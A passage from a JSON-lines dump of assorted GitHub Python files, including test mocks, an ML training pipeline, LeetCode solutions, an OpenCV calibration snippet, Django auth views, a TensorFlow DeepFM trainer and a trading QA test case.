-> None:\n 
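# mock side effect: flip the queue 'running' flag to False after a short delay,\n # mimicking how the real ScriptQueue reacts to the pause command\n 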
asyncio.create_task(self._set_queue_state(False))\n\n async def script_queue_cmd_resume(\n self, *args: typing.Any, **kwargs: typing.Any\n ) -> None:\n asyncio.create_task(self._set_queue_state(True))\n\n async def get_logevent_queue(\n self, *args: typing.Any, **kwargs: typing.Any\n ) -> types.SimpleNamespace:\n await asyncio.sleep(1.0)\n return self.logevent_queue\n\n async def _set_queue_state(self, state: bool) -> None:\n await asyncio.sleep(2.0)\n self.logevent_queue.running = state\n","repo_name":"lsst-ts/ts_observatory_control","sub_path":"tests/test_script_queue.py","file_name":"test_script_queue.py","file_ext":"py","file_size_in_byte":14851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29777419247","text":"import os\nfrom datetime import datetime\nfrom typing import Any, Callable\n\nimport numpy as np # type: ignore\nimport pandas as pd # type: ignore\nfrom sklearn.pipeline import Pipeline # type: ignore\n\nfrom pipeline import run_models\nfrom pipeline.models.best_params_models import (\n create_mlp_best_params,\n create_rf_best_params,\n create_xgboost_best_params,\n create_logistic_regression_best_params,\n)\nfrom pipeline.models.utils import scoring\nfrom pipeline.models.utils.model_enum import Model\nfrom pipeline.preprocessing.compute_features.feature import FeatureList, Feature\n\nfrom pipeline.preprocessing.sk_formatter import SKFormatter\nfrom pipeline.run_models import get_prediction, save_metrics, save_skformatter_params\n\nModel_best = tuple[Model, Callable[[pd.DataFrame, pd.Series], Any]]\n\n\ndef runner(\n model_jobs: list[Model_best],\n train_formatter: SKFormatter,\n test_formatter: SKFormatter,\n) -> dict[str, pd.Series]:\n \"\"\"\n The runner, at a high level, is responsible for:\n 1. Fitting the individual models of the model_jobs\n 2. 
Saving the SKFormatter params alongside the metrics of each model\n\n Args:\n model_jobs (list[Model]): Models for which to fit using existing best params\n train_formatter (SKFormatter): SKFormatter instance for formatting the training set\n test_formatter (SKFormatter): SKFormatter instance for formatting the test set\n Returns:\n dict[str, pd.Series]: dict mapping model name to its predictions.\n The predictions can be indexed by osm_id.\n \"\"\"\n\n # Obtain train and test data\n x_train, _, y_train, _ = train_formatter.generate_train_test_split()\n _, x_test, _, y_test = test_formatter.generate_train_test_split()\n\n date = datetime.today().strftime(\"%m_%d_%H_%M\")\n path = f\"/share-files/runs/{date}/{date}_\"\n\n # Generate folders and save header for metrics\n metrics_file = f\"{path}metrics\"\n os.makedirs(os.path.dirname(metrics_file), exist_ok=True)\n with open(metrics_file, \"a+\") as f:\n f.write(\"model,mae,mape,mse,rmse,r2,ev\\n\") # header for metrics\n\n # Save SKFormatter params\n save_skformatter_params(train_formatter.params, f\"{path}_skf_params\")\n\n # Test each of the best_models using params from earlier run\n predictions: dict[str, pd.Series] = {}\n for model_name, pipeline in model_jobs:\n # Fit model\n model = pipeline(x_train, y_train)\n\n # Test model\n y = get_prediction(model_name.value, model, x_test) # type: ignore\n predictions[str(model_name.value)] = y\n\n # Save metrics\n metrics = scoring.score_model(y_test, y)\n save_metrics(model_name.value, metrics, metrics_file)\n\n return predictions\n\n\ndef main():\n # define a list of models and their corresponding model using best params\n model_jobs: list[Model_best] = [\n (Model.MLP, create_mlp_best_params),\n (Model.RF, create_rf_best_params),\n (Model.XGB, create_xgboost_best_params),\n (Model.LOGREG, create_logistic_regression_best_params),\n # (Model.STATMODEL, statistical_model), # TODO: We do not have a StatModel yet\n ]\n\n train_format = SKFormatter(\n \"/share-files/pickle_files_features_and_ground_truth/2012.pkl\",\n test_size=0.0,\n discard_features=FeatureList(\n [\n Feature.OSM_ID,\n Feature.COORDINATES,\n Feature.DISTANCES,\n ]\n ),\n )\n\n test_format = SKFormatter(\n \"/share-files/pickle_files_features_and_ground_truth/2013.pkl\",\n test_size=1.0,\n discard_features=train_format.discard_features,\n )\n\n runner(model_jobs, train_format, test_format)\n\n # Run new GridSearch\n run_models.main()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SW8-Mobility/speed_limit_floating_car_data","sub_path":"pipeline/run_best_models.py","file_name":"run_best_models.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22450281736","text":"from typing import List\n\n\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n if len(nums) < 2:\n return 0\n cnt = left = 1\n right = nums[0]\n while right < len(nums) - 1:\n cnt += 1\n nxt = max(i + nums[i] for i in range(left, right + 1))\n left, right = right + 1, nxt\n return cnt\n","repo_name":"MtDeity/leetcode-python","sub_path":"Array/jump_game_ii.py","file_name":"jump_game_ii.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5725806524","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[56]:\n\n\n# Program 44 :- Alphabet \"W\"\ni = 0\nj = 3\nfor row in range(4):\n for col in range(7):\n if (col == 0 or col == 6) or (row == 1 and col 
== 4) or (row == 2 and col == 5) :\n print(\"*\", end = \"\")\n elif row == i and col == j:\n print(\"*\", end = \"\")\n i += 1\n j -= 1\n else:\n print(end =\" \")\n print(\"\\r\")\n\n","repo_name":"mohitrathore1807/Python_Codes","sub_path":"44. Alphabet \"W\".py","file_name":"44. Alphabet \"W\".py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"17899256188","text":"# Inspired by Self-Driving-Car Nano Degree from Udacity\n\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\n\nimage_path = os.path.join(os.getcwd(), \"../../samples/chess_boards/chess_board_0.png\")\n\nif not os.path.exists(image_path):\n print(\"Image does not exist!\")\n exit()\n\nnx = 8 # number of inside corners in x direction\nny = 6 # number of inside corners in y direction\n\nimg = cv2.imread(image_path)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\nif ret == True:\n cv2.drawChessboardCorners(img, (nx, ny), corners, ret)\n plt.imshow(img)\n plt.show()\n\n","repo_name":"eshanmherath/AV-Perception","sub_path":"image_processing/camera_calibrations/chess_board_method_0.py","file_name":"chess_board_method_0.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"4133926400","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n def subarraysDivByK(self, nums: List[int], k: int) -> int:\n n = len(nums)\n subarray_count = 0\n \n remainder_count = defaultdict(int)\n remainder_count[0] = 1\n nums.append(0)\n\n for index in range(n):\n nums[index] += nums[index-1]\n curr_remainder = nums[index] % k\n needed_remainder = (curr_remainder -k)%k\n subarray_count += remainder_count[needed_remainder]\n remainder_count[curr_remainder] += 1\n\n return subarray_count","repo_name":"NathanZlion/Competitive-Programming","sub_path":"0974-subarray-sums-divisible-by-k/0974-subarray-sums-divisible-by-k.py","file_name":"0974-subarray-sums-divisible-by-k.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"6170345096","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nu'''\nCheck whether a binary number is a palindrome.\nInput: an unsigned number of arbitrary length written in binary notation\nOutput: 0 -- if not a palindrome, 1 -- if a palindrome\nExample: 11011\n'''\nfrom __future__ import print_function\n\nnum = raw_input().strip()\ntmp = num[::-1]\nresult = 0\nif tmp == num:\n result = 1\nelse:\n result = 0\n\nprint(\"{0} {1}\".format(num, result))\n","repo_name":"LitRidl/checker-content","sub_path":"contlab5/26/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28647398826","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth import logout\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework import mixins\nfrom drf_spectacular.utils import (\n extend_schema,\n extend_schema_view,\n OpenApiResponse,\n)\n\nfrom pinakes.common.auth.keycloak_django.clients import get_oidc_client\nfrom pinakes.main.auth import 
serializers\n\n\n@extend_schema_view(\n retrieve=extend_schema(\n description=\"Get the current login user\",\n tags=[\"auth\"],\n operation_id=\"me_retrieve\",\n ),\n)\nclass CurrentUserViewSet(viewsets.GenericViewSet, mixins.RetrieveModelMixin):\n permission_classes = (IsAuthenticated,)\n serializer_class = serializers.CurrentUserSerializer\n model = get_user_model()\n\n def get_object(self):\n return self.request.user\n\n\nclass SessionLogoutView(APIView):\n permission_classes = (IsAuthenticated,)\n\n @extend_schema(\n description=\"Logout current session\",\n tags=[\"auth\"],\n operation_id=\"logout_create\",\n request=None,\n responses={\n status.HTTP_204_NO_CONTENT: OpenApiResponse(\n description=\"Logout successful\"\n )\n },\n )\n def post(self, request):\n get_social_user = getattr(\n request.successful_authenticator, \"get_social_user\", None\n )\n if get_social_user is None:\n return Response(\n data={\n \"detail\": _(\"Logout is not supported with Bearer auth.\")\n },\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n extra_data = get_social_user(request).extra_data\n openid_client = get_oidc_client()\n openid_client.logout_user_session(\n extra_data[\"access_token\"], extra_data[\"refresh_token\"]\n )\n logout(request)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"ansible/pinakes","sub_path":"pinakes/main/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"35148434729","text":"import pandas as pd\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport time\r\npd.set_option('display.max_columns', 100) # set the maximum number of columns to display\r\n\r\nTRAIN_FILE = \"D:\\\\data\\\\input\\\\tl\\\\trainData.csv\"\r\nTEST_FILE = \"D:\\\\data\\\\input\\\\tl\\\\testData.csv\"\r\nmodel_path=\"d:/data/input/tl/model/dfm/\"\r\nfdict_path = \"d:/data/input/tl/feature_dict\"\r\n\r\n# target|clickDate|uid|newsid|pos|app_version|device_vendor|netmodel|osversion|lng|lat|device_version|date|hour|minute|level|personidentification|followscore|personalscore|gender|delaySecond\r\nNUMERIC_COLS = [\"date\",\"hour\",\"minute\"]\r\nIGNORE_COLS = [\"lng\",\"lat\", \"target\",\"clickDate\" ,\"followscore\",\"personalscore\",\"delaySecond\" ,\"deviceid\",\"trguid\",\"guid\"]\r\n# NUMERIC_COLS = [\"lng\",\"lat\",\"date\",\"hour\",\"minute\", \"level\",\"followscore\",\"personalscore\",\"gender\",\"delaySecond\"]\r\n# IGNORE_COLS = [\"lng\",\"lat\", \"target\",\"clickDate\" ,\"followscore\",\"personalscore\"]\r\ntrain_num=10000000\r\n\"\"\"Model hyper-parameters\"\"\"\r\ndfm_params = {\r\n \"decay\": 0.9,\r\n \"learn_rate_step\":13117, # update the learning rate after feeding this many batches; usually total_samples / BATCH_SIZE (13117, 8238)\r\n \"threads\":6,\r\n \"use_fm\": True,\r\n \"use_deep\": True,\r\n \"embedding_size\": 10,\r\n \"dropout_fm\": [1.0, 1.0],\r\n \"deep_layers\": [32, 32],\r\n \"dropout_deep\": [0.5, 0.5, 0.5],\r\n \"deep_layer_activation\": tf.nn.relu,\r\n \"epoch\": 20,\r\n \"batch_size\": 1024,\r\n \"learning_rate\": 0.01,\r\n # \"learning_rate\":0.001, 0.1-1 0.01-10 0.002-10 0.001-10 (but loss went from 2 to 3, seemingly pulled up by a few outlier records)\r\n \"optimizer\": \"adam\",\r\n \"batch_norm\": 1,\r\n \"batch_norm_decay\": 0.995,\r\n \"l2_reg\": 0.01,\r\n \"verbose\": True,\r\n \"eval_metric\": 'gini_norm',\r\n \"random_seed\": 3\r\n}\r\n\r\ndfTrain = pd.read_csv(TRAIN_FILE)#.head(10)\r\ndfTest = pd.read_csv(TEST_FILE)#.head(10)\r\ndfDict= pd.concat([dfTest, dfTrain], 
ignore_index=True)\r\nprint(dfTrain.head(5))\r\n\r\ndata_rows=len(dfTrain)\r\n\r\nfeature_dict = {}\r\ntotal_feature = 0\r\nfor col in dfDict.columns:\r\n if col in IGNORE_COLS:\r\n continue\r\n elif col in NUMERIC_COLS:\r\n feature_dict[col] = total_feature\r\n total_feature += 1\r\n else:\r\n unique_val = dfDict[col].unique()\r\n feature_dict[col] = dict(zip(unique_val,range(total_feature,len(unique_val) + total_feature)))\r\n total_feature += len(unique_val)\r\nprint(total_feature)\r\n# with open(fdict_path, 'w+') as f:\r\n# f.write(str(feature_dict) )\r\n\r\ndef norm_itemID(feat_dict,item_df):\r\n f_index=[]\r\n f_value=[]\r\n for i in item_df.index:\r\n item=item_df.iloc[i,:]\r\n itemID=item[0]\r\n penalty=item[1]\r\n genre = item[2]\r\n artistid = item[3]\r\n singertype= item[4]\r\n region= item[5]\r\n # f_value.append([1, 1, 1, penalty, 1, 1])\r\n # f_index.append( [ feat_dict['itemID'][itemID], 0,0, feat_dict['penalty'], feat_dict['genre'][genre], feat_dict['artistid'][artistid] ] )\r\n f_value.append([1,1, 1, 1, penalty, 1,1, 1, 1, 1])\r\n f_index.append( [0, feat_dict['artistid'][artistid],feat_dict['itemID'][itemID], 0, feat_dict['penalty'], 0,0, feat_dict['genre'][genre], feat_dict['singertype'][singertype], feat_dict['region'][region] ] )\r\n return f_index,f_value\r\n\r\ndef norm_f_index(feat_dict, uid_country, f_index):\r\n # itemID country uId penalty genre artistid\r\n # uId artistid itemID country penalty ua appversion genre singertype region\r\n uid=uid_country[0]\r\n country=uid_country[1]\r\n ua=uid_country[2]\r\n appversion=uid_country[3]\r\n user_index=feat_dict['uId'][uid]\r\n country_index=feat_dict['country'][country]\r\n # it would be nice if we could simply overwrite these two columns with the user info\r\n for v in f_index:\r\n # v[1]=country_index\r\n # v[2]=user_index\r\n v[3]=country_index\r\n v[0]=user_index\r\n v[5]=ua\r\n v[6]=appversion\r\n return f_index\r\n\r\n# f_index,f_value=norm_itemID(feature_dict, item_df)\r\n\r\n\"\"\"\r\nConvert the training set; the first half could be used for training and the second half for testing, but every id must be recorded in the feature dictionary\r\n\"\"\"\r\ntrain_y = dfTrain[['target']]#.values.tolist()\r\ntrain_feature_index = dfTrain.copy()\r\ntrain_feature_value = dfTrain.copy()\r\n# train_y = dfTrain[['target']].tail(train_num).values.tolist()\r\n# train_feature_index = dfTrain.tail(train_num).copy()\r\n# train_feature_value = dfTrain.tail(train_num).copy()\r\n\r\nfor col in train_feature_index.columns:\r\n if col in IGNORE_COLS:\r\n train_feature_index.drop(col,axis=1,inplace=True)\r\n train_feature_value.drop(col,axis=1,inplace=True)\r\n continue\r\n elif col in NUMERIC_COLS:\r\n train_feature_index[col] = feature_dict[col]\r\n else:\r\n train_feature_index[col] = train_feature_index[col].map(feature_dict[col])\r\n train_feature_value[col] = 1\r\nprint(train_feature_index.head(5))\r\nprint(train_feature_value.head(5))\r\nprint(train_feature_index.tail(5))\r\nprint(train_feature_value.tail(5))\r\n\r\ndfm_params['feature_size'] = total_feature # 254\r\ndfm_params['field_size'] = len(train_feature_index.columns) # 37\r\nprint(len(train_feature_index.columns))\r\n\r\ndef get_batch(train_feature_index,train_feature_value,train_y, batch_size):\r\n with tf.device('/cpu:0'):\r\n print(len(train_feature_index),len(train_y))\r\n input_queue = tf.train.slice_input_producer([train_feature_index,train_feature_value,train_y],num_epochs=dfm_params['epoch'], shuffle=True )\r\n i_batch, v_batch, label_batch = tf.train.batch(input_queue, batch_size=batch_size, num_threads=dfm_params['threads'], capacity=32, allow_smaller_final_batch=False)\r\n print(v_batch)\r\n return i_batch, v_batch,label_batch\r\ndef 
data_generator(train_feature_index,train_feature_value,train_y):\r\n # dataset = np.array( train_feature_index )\r\n print(type(train_feature_index),type(train_feature_value),type(train_y))\r\n dataset = np.array( pd.concat([train_feature_index, train_feature_value,train_y],axis=1) )\r\n for d in dataset:\r\n # print(d)\r\n # print(d[0:14])\r\n # print(d[14:28])\r\n # print(d[28])\r\n yield d[0:14],d[14:28],d[28]\r\n\r\ndataset = tf.data.Dataset.from_generator( lambda:data_generator(train_feature_index,train_feature_value,train_y), ( tf.int32, tf.float32, tf.float32), (tf.TensorShape([14,]), tf.TensorShape([14,]), tf.TensorShape([]) ))\r\ndataset = dataset.repeat(dfm_params['epoch'])\r\ndataset = dataset.batch(dfm_params['batch_size'])\r\niterator = dataset.make_one_shot_iterator()\r\none_element = iterator.get_next()\r\n\r\n\"\"\"Start building the model\"\"\"\r\nfeat_index = tf.placeholder(tf.int32, shape=[None, None], name='feat_index')\r\nfeat_value = tf.placeholder(tf.float32, shape=[None, None], name='feat_value')\r\n\r\nlabel = tf.placeholder(tf.float32, shape=[None, 1], name='label')\r\n\r\n\"\"\"Build the weights\"\"\"\r\nweights = dict()\r\n\r\n# embeddings\r\nweights['feature_embeddings'] = tf.Variable(\r\n tf.random_normal([dfm_params['feature_size'], dfm_params['embedding_size']], 0.0, 0.01),\r\n name='feature_embeddings')\r\nweights['feature_bias'] = tf.Variable(tf.random_normal([dfm_params['feature_size'], 1], 0.0, 1.0), name='feature_bias')\r\n\r\n# deep layers\r\nnum_layer = len(dfm_params['deep_layers'])\r\ninput_size = dfm_params['field_size'] * dfm_params['embedding_size']\r\nglorot = np.sqrt(2.0 / (input_size + dfm_params['deep_layers'][0]))\r\n\r\nweights['layer_0'] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(input_size, dfm_params['deep_layers'][0])), dtype=np.float32\r\n)\r\nweights['bias_0'] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(1, dfm_params['deep_layers'][0])), dtype=np.float32\r\n)\r\n\r\nfor i in range(1, num_layer):\r\n glorot = np.sqrt(2.0 / (dfm_params['deep_layers'][i - 1] + dfm_params['deep_layers'][i]))\r\n weights[\"layer_%d\" % i] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(dfm_params['deep_layers'][i - 1], dfm_params['deep_layers'][i])),\r\n dtype=np.float32) # layers[i-1] * layers[i]\r\n weights[\"bias_%d\" % i] = tf.Variable(\r\n np.random.normal(loc=0, scale=glorot, size=(1, dfm_params['deep_layers'][i])),\r\n dtype=np.float32) # 1 * layer[i]\r\n\r\n# final concat projection layer\r\n\r\nif dfm_params['use_fm'] and dfm_params['use_deep']:\r\n input_size = dfm_params['field_size'] + dfm_params['embedding_size'] + dfm_params['deep_layers'][-1]\r\nelif dfm_params['use_fm']:\r\n input_size = dfm_params['field_size'] + dfm_params['embedding_size']\r\nelif dfm_params['use_deep']:\r\n input_size = dfm_params['deep_layers'][-1]\r\n\r\nglorot = np.sqrt(2.0 / (input_size + 1))\r\nweights['concat_projection'] = tf.Variable(np.random.normal(loc=0, scale=glorot, size=(input_size, 1)),\r\n dtype=np.float32, name='concat_projection')\r\nweights['concat_bias'] = tf.Variable(tf.constant(0.01), dtype=np.float32, name='concat_bias')\r\n\r\n\"\"\"embedding\"\"\"\r\nembeddings = tf.nn.embedding_lookup(weights['feature_embeddings'], feat_index)\r\n\r\nreshaped_feat_value = tf.reshape(feat_value, shape=[-1, dfm_params['field_size'], 1])\r\n\r\nembeddings = tf.multiply(embeddings, reshaped_feat_value)\r\n\r\n\"\"\"fm part\"\"\"\r\nfm_first_order = tf.nn.embedding_lookup(weights['feature_bias'], feat_index)\r\nfm_first_order = 
tf.reduce_sum(tf.multiply(fm_first_order, reshaped_feat_value), 2)\r\n\r\nsummed_features_emb = tf.reduce_sum(embeddings, 1)\r\nsummed_features_emb_square = tf.square(summed_features_emb)\r\n\r\nsquared_features_emb = tf.square(embeddings)\r\nsquared_sum_features_emb = tf.reduce_sum(squared_features_emb, 1)\r\n\r\nfm_second_order = 0.5 * tf.subtract(summed_features_emb_square, squared_sum_features_emb)\r\n\r\n\"\"\"deep part\"\"\"\r\ny_deep = tf.reshape(embeddings, shape=[-1, dfm_params['field_size'] * dfm_params['embedding_size']])\r\n\r\nfor i in range(0, len(dfm_params['deep_layers'])):\r\n y_deep = tf.add(tf.matmul(y_deep, weights[\"layer_%d\" % i]), weights[\"bias_%d\" % i])\r\n y_deep = tf.nn.relu(y_deep)\r\n\r\n\"\"\"final layer\"\"\"\r\nif dfm_params['use_fm'] and dfm_params['use_deep']:\r\n concat_input = tf.concat([fm_first_order, fm_second_order, y_deep], axis=1)\r\nelif dfm_params['use_fm']:\r\n concat_input = tf.concat([fm_first_order, fm_second_order], axis=1)\r\nelif dfm_params['use_deep']:\r\n concat_input = y_deep\r\n\r\n# item_index = tf.slice(feat_index,[0,0],[label.shape], name='item_index')\r\nout = tf.nn.sigmoid(tf.add(tf.matmul(concat_input, weights['concat_projection']), weights['concat_bias']) ,name=\"out\")\r\noutpre = tf.concat([out, label],1 ,name=\"outpre\")\r\n\r\n\"\"\"loss and optimizer\"\"\"\r\nglobal_step = tf.Variable(0, trainable=False)\r\nlearning_rate = tf.train.exponential_decay(dfm_params['learning_rate'], global_step,dfm_params['learn_rate_step'], dfm_params['decay'], staircase=True)\r\nloss = tf.losses.log_loss(tf.reshape(label, (-1, 1)), out)\r\noptimizer = tf.train.AdamOptimizer(learning_rate=dfm_params['learning_rate'], beta1=0.9, beta2=0.999,epsilon=1e-8).minimize(loss,global_step=global_step)\r\n\r\n# i_batch, v_batch, label_batch = get_batch(train_feature_index,train_feature_value,train_y.values.tolist(), dfm_params['batch_size'])\r\n\r\ndef getAuc(predict_playNum):\r\n p=[]\r\n n=[]\r\n count=0\r\n for i in predict_playNum.index:\r\n row = predict_playNum.iloc[i, :]\r\n if row[1]>=1:\r\n p.append(row[0])\r\n else:\r\n n.append(row[0])\r\n for rowp in p:\r\n for rown in n:\r\n if rowp>rown:\r\n count=count+1\r\n return count / (len(p)*len(n))\r\n\r\n\"\"\"train\"\"\"\r\ngpu_config = tf.ConfigProto(device_count={'GPU': 0, 'CPU': 6} )\r\n# gpu_config = tf.ConfigProto()\r\ngpu_config.gpu_options.allow_growth = True\r\ngpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\r\nconfig=tf.ConfigProto(gpu_options=gpu_options)\r\nwith tf.Session(config=config) as sess:\r\n writer = tf.summary.FileWriter(\"D:\\\\Anaconda3\\\\Scripts\\\\logs\", sess.graph)\r\n sess.run(tf.global_variables_initializer())\r\n sess.run(tf.local_variables_initializer())\r\n # start the coordinator\r\n coord = tf.train.Coordinator()\r\n # use start_queue_runners to launch the queue-filling threads\r\n threads = tf.train.start_queue_runners(sess, coord)\r\n batch= int(data_rows / dfm_params['batch_size'])\r\n print(data_rows , dfm_params['batch_size'],batch)\r\n batch_x_epochs = 0 # global_step\r\n end_loss=0\r\n tf.train.Saver().restore(sess, save_path=model_path)\r\n print('start training... 
',time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))\r\n try:\r\n while not coord.should_stop(): # batch= int(data_rows / dfm_params['batch_size']) 9000\r\n # fetch batch_size samples and labels for each training batch\r\n\r\n # i, v, l = sess.run([i_batch, v_batch, label_batch])\r\n # predict_label = sess.run([outpre], feed_dict={feat_value: v, feat_index: i, label: l})\r\n # recDf=pd.DataFrame(predict_label[0],columns=['score','playNum'])\r\n # print(getAuc(recDf))\r\n # recDf.to_csv(rec_path+'dfmRec'+ str(batch_x_epochs), index=False, header=True)\r\n # # if batch_x_epochs % 100 == 0 and batch_x_epochs!=0:\r\n\r\n # i, v, l = sess.run([i_batch, v_batch, label_batch])\r\n i, v, l = sess.run(one_element)\r\n # print('index: ',i)\r\n # print( 'value: ',v)\r\n # print('label: ', l)\r\n # print(i.shape)\r\n sess.run(optimizer, feed_dict={feat_index: i, feat_value: v, label: l.reshape(dfm_params['batch_size'],1) })\r\n train_loss = loss.eval({feat_index: i, feat_value: v, label: l.reshape(dfm_params['batch_size'],1)})\r\n end_loss=train_loss\r\n # if batch_x_epochs % 200 == 0 and batch_x_epochs!=0:\r\n if batch_x_epochs % 600 == 0:\r\n learning_rate_val = sess.run(learning_rate)\r\n global_step_val = sess.run(global_step)\r\n # print('label',l )\r\n print(\"batch_x_epochs %d, Training loss %g, global_step %g, learning_rate %g, at %s\" % (batch_x_epochs, train_loss, global_step_val,learning_rate_val, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) ))\r\n tf.train.Saver().save(sess, save_path=model_path)\r\n frozen_graph_def = tf.graph_util.convert_variables_to_constants(\r\n sess,\r\n sess.graph_def,\r\n [\"feat_index\", \"feat_value\", \"out\", \"outpre\"])\r\n # save the graph as a pb file\r\n with open(model_path + 'model.pb', 'wb') as f:\r\n f.write(frozen_graph_def.SerializeToString())\r\n batch_x_epochs = batch_x_epochs + 1\r\n\r\n except tf.errors.OutOfRangeError: # raised once num_epochs epochs have been exhausted\r\n print(\"---Train end---\", batch_x_epochs, end_loss)\r\n tf.train.Saver().save(sess, save_path=model_path)\r\n finally:\r\n # the coordinator signals all threads to terminate\r\n coord.request_stop()\r\n print('---Program end---')\r\n coord.join(threads) # join the started threads to the main thread and wait for them to finish\r\n\r\n\r\n\r\n\r\n","repo_name":"shuDaoNan9/Competitions","sub_path":"tlDFMtest.py","file_name":"tlDFMtest.py","file_ext":"py","file_size_in_byte":14946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22498276715","text":"import logging\nfrom pathlib import Path\n\nfrom custom import basic_custom_actions as bca\nfrom custom.basic_custom_actions import timestamps\nfrom test_framework.core.test_case import TestCase\nfrom test_framework.core.try_exept_decorator import try_except\nfrom test_framework.data_sets.message_types import ORSMessageType\nfrom test_framework.java_api_wrappers.JavaApiManager import JavaApiManager\nfrom test_framework.java_api_wrappers.java_api_constants import JavaApiFields, OrdTypes, OrderReplyConst\nfrom test_framework.java_api_wrappers.oms.es_messages.NewOrderReplyOMS import NewOrderReplyOMS\nfrom test_framework.java_api_wrappers.oms.es_messages.OrdReportOMS import OrdReportOMS\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nseconds, nanos = timestamps() # Test case start time\n\n\nclass QAP_T10475(TestCase):\n @try_except(test_id=Path(__file__).name[:-3])\n def __init__(self, report_id, session_id, data_set, environment):\n super().__init__(report_id, session_id, data_set, environment)\n self.test_id = bca.create_event(Path(__file__).name[:-3], 
self.report_id)\n self.java_api_connectivity = self.java_api = self.environment.get_list_java_api_environment()[0].java_api_conn\n self.java_api_manager = JavaApiManager(self.java_api_connectivity, self.test_id)\n self.venue_client_name = self.data_set.get_venue_client_names_by_name('client_1_venue_1')\n self.new_order_reply = NewOrderReplyOMS(self.data_set).set_unsolicited_dma_limit()\n self.order_report = OrdReportOMS(self.data_set)\n # endregion\n\n @try_except(test_id=Path(__file__).name[:-3])\n def run_pre_conditions_and_steps(self):\n # region step 1: Create Unsolicited order\n last_venue_ord_id = self.new_order_reply.get_parameters()[JavaApiFields.NewOrderReplyBlock.value][JavaApiFields.LastVenueOrdID.value]\n self.new_order_reply.update_fields_in_component(JavaApiFields.NewOrderReplyBlock.value,\n {\n JavaApiFields.OrdType.value: OrdTypes.StopLimit.value,\n })\n self.java_api_manager.send_message_and_receive_response(self.new_order_reply)\n order_reply = self.java_api_manager.get_last_message(ORSMessageType.OrderReply.value).get_parameters()[JavaApiFields.OrdReplyBlock.value]\n self.java_api_manager.compare_values({JavaApiFields.OrdType.value: OrdTypes.StopLimit.value,\n JavaApiFields.TransStatus.value: OrderReplyConst.TransStatus_OPN.value},\n order_reply, 'Verify that the unsolicited order has the proper values (step 1)')\n order_id = order_reply[JavaApiFields.OrdID.value]\n # endregion\n\n # region step 2: Send OrdReport\n self.order_report.set_default_open(order_id, last_venue_ord_id)\n self.order_report.update_fields_in_component(JavaApiFields.OrdReportBlock.value, {\n JavaApiFields.ExecType.value: OrderReplyConst.ExecType_RES.value\n })\n self.java_api_manager.send_message_and_receive_response(self.order_report)\n order_reply = self.java_api_manager.get_last_message(ORSMessageType.OrderReply.value).get_parameters()[\n JavaApiFields.OrdReplyBlock.value]\n self.java_api_manager.compare_values({JavaApiFields.OrdType.value: OrdTypes.Limit.value,\n JavaApiFields.TransStatus.value: OrderReplyConst.TransStatus_OPN.value},\n order_reply, 'Verify that the unsolicited order has the proper values (step 2)')\n # endregion\n","repo_name":"YevhenMoroz/th2-script-quod-demo","sub_path":"test_cases/eq/DMA/QAP_T10475.py","file_name":"QAP_T10475.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43700017434","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.transforms import Bbox\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random\nimport csv\nimport heapq\nimport glob\nimport itertools\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.ticker import FormatStrFormatter\nimport matplotlib.ticker as ticker\nimport matplotlib.colors as colors\nfrom scipy import stats\nfrom scipy.special import hyperu\n# from mpmath import sqrt, pi, gamma, hyperu, fac, fac2, exp\nimport mpmath as mp\n\nplt.rc('text', usetex=True)\nplt.rc('text.latex', preamble=r'\\usepackage{amsmath}')\n\n\ndef plot_2d_lpv17(axis, numb_qy, omega_min, omega_max):\n\n marker = itertools.cycle(('1', '2', '3', '4', ',', '+', '.', 'o', '*', '^', 'v', '>', '<', 'X', '_', 'd', '|', 'H'))\n\n for i, name in enumerate([\"V1_V17_0.0001\", 